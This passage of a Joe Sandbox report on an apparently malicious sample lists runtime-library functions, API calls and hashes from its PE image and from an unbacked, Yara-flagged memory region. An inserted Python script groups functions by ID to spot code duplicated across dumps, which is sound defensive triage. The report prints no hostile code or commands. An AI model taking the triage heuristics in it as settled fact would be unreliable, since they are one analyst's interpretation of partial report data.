                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 1381464787-923244539
• Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
• Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
• Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
• Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
APIs
• Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 1990795212-2046700901
• Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
• Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
• Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
• Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
• FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
• _free.LIBCMT ref: 0042E069
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: CloseFreeHandleLibrary_free
• String ID: B
• API String ID: 621396759-3071617958
• Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
• Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
• Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
• Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
• __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pScheduler$version
• API String ID: 1687795959-3154422776
• Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
• Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
• Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
• Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
• Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
• Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
• Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
• Instruction ID: f894a45ef626dd1adfb82ee4a64b7b95086c45a33f7f4bc7b5ae4f5ad488d0db
• Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
• Instruction Fuzzy Hash: B7A169729017869FE765CF18C8847AFBBE1EF92354F58816FD6859B381C3348942CB51
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
• Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
• Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
• Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
• Instruction ID: fe7958175614dcaeddd9998412e9dc69700130642446567cac0f93f24014a17f
• Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
• Instruction Fuzzy Hash: 4A413E33A002156BFBA46FB98C44BBF3A66EFC1730F16065BF72AD66D0DB3444458A61
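The four entries above list the same two CRT helpers (__alldvrm$_strrchr, API String ID 1036877536-0, and _free, 269201875-0) twice each: once in the image mapped from the PE at 00400000 and once in the region at 024C0000 that is not backed by a PE and carries Yara matches, with a different Opcode ID in each copy. When triaging a report of this size, functions that recur across dump sources in this way are worth pivoting on, since a second copy of the same code in a non-PE-backed region is consistent with the unpacking signatures reported for this sample. The script below is an added example and is not part of the Joe Sandbox report: it parses this listing format as it appears on the page, groups functions by API String ID and reports those present in more than one dump source. The input is a trimmed excerpt of the entries above (constructed from the page, with Snapshot File and Instruction ID lines dropped); the field names and the bare "APIs" line that opens each entry come from the page, while the function names and result keys are my own.

```python
import re
from collections import defaultdict

# Constructed input: five function entries copied from the report excerpt above
# (page whitespace trimmed, Snapshot File / Instruction ID lines dropped). The
# last entry is the truncated one at the end of the excerpt (call lines only).
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
APIs
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• API ID: __alldvrm$_strrchr
• API String ID: 1036877536-0
• Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
APIs
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: _free
• API String ID: 269201875-0
• Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
APIs
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• API ID: _free
• API String ID: 269201875-0
• Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
APIs
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024F6BDA
• __freea.LIBCMT ref: 024F6BF5
  • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
"""

CALL = re.compile(r"^•\s*(.+?),? ref:\s*[0-9A-Fa-f]+$")          # "Api.Module(args), ref: addr"
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")                     # "• Key: value"
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+), based on PE:\s*(true|false)")
SUBCALL = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")


def parse_entries(text):
    """One dict per function; a bare 'APIs' line opens a new entry."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"yara": False, "calls": []}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":
            cur["yara"] = True
            continue
        call = CALL.match(line)
        if call:
            # Keep only Api.Module, dropping arguments and the subcall prefix.
            cur["calls"].append(SUBCALL.sub("", call.group(1).split("(", 1)[0]))
            continue
        field = FIELD.match(line)
        if not field:
            continue  # plain header lines such as "Memory Dump Source"
        key, val = field.group(1).strip(), field.group(2).strip()
        if key == "Source File":
            off = OFFSET.search(val)
            cur["offset"] = int(off.group(1), 16)
            cur["backed_by_pe"] = off.group(2) == "true"
        else:
            cur[key] = val
    return entries


def shared_functions(entries):
    """API String IDs seen in more than one memory dump, and how the copies differ."""
    by_id = defaultdict(list)
    for e in entries:
        if e.get("API String ID") and "offset" in e:
            by_id[e["API String ID"]].append(e)
    shared = {}
    for sid, group in by_id.items():
        offsets = sorted({e["offset"] for e in group})
        if len(offsets) > 1:
            shared[sid] = {
                "api": group[0].get("API ID", ""),
                "offsets": offsets,
                "yara_hit": any(e["yara"] for e in group),
                "unbacked_copy": any(not e["backed_by_pe"] for e in group),
                "opcode_ids_differ": len({e.get("Opcode ID") for e in group}) > 1,
            }
    return shared


if __name__ == "__main__":
    for sid, info in shared_functions(parse_entries(SAMPLE)).items():
        print(sid, info["api"], [hex(o) for o in info["offsets"]],
              "yara" if info["yara_hit"] else "-", info["opcode_ids_differ"])
```

Run against the full function listing (copied out of the report as text), the same grouping shows which functions exist only in the non-PE-backed region, which is usually where the unpacked payload's own code, rather than CRT helpers like these, will be found.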
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024F047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024F6B51
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024F6BDA
                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024F6BEC
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 024F6BF5
                                                                                                                                                                                                                                                                      • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                    • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                    • Instruction ID: bde06e3fe233c29f72e09ac2985bca0aebc39ba2660dc752e23c683269eaf794
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12311232A0021AABDF24CF65CC40DAF7BAAEF80714F06026EED24D7250EB35C951CB90
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                    • Instruction ID: 646cc8fe2d83adde2bde8f9c11e81b4c899ec82ede90ad52a219de731c094558
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02214F79E0010AAFDF40EF99CC819BEB7B9EF09714F20006EE605A7250D775AD01CB90
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2630251706-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1339878773-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 024E934A
  • Part of subcall function 024E9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024E92C6
  • Part of subcall function 024E9297: ___AdjustPointer.LIBCMT ref: 024E92E1
• _UnwindNestedFrames.LIBCMT ref: 024E935F
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024E9370
• CallCatchBlock.LIBVCRUNTIME ref: 024E9398
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
• GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378), ref: 024F51C8
• GetLastError.KERNEL32(?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024F2213), ref: 024F51D4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024F51E2
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024E63AF
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024E63C3
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024E63DB
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024E63F3
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
  • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
  • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
  • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                    • Instruction ID: 8de8eb5cdab98f28f590e1f8a502191193ae98d7daddfe58296bc3d5ac6bd466
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8118E76800204AFC715DF65C880ADBF7BAFF59320F014A5FE9568B591DBB0E904CBA0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                      • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                      • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2250070497-0
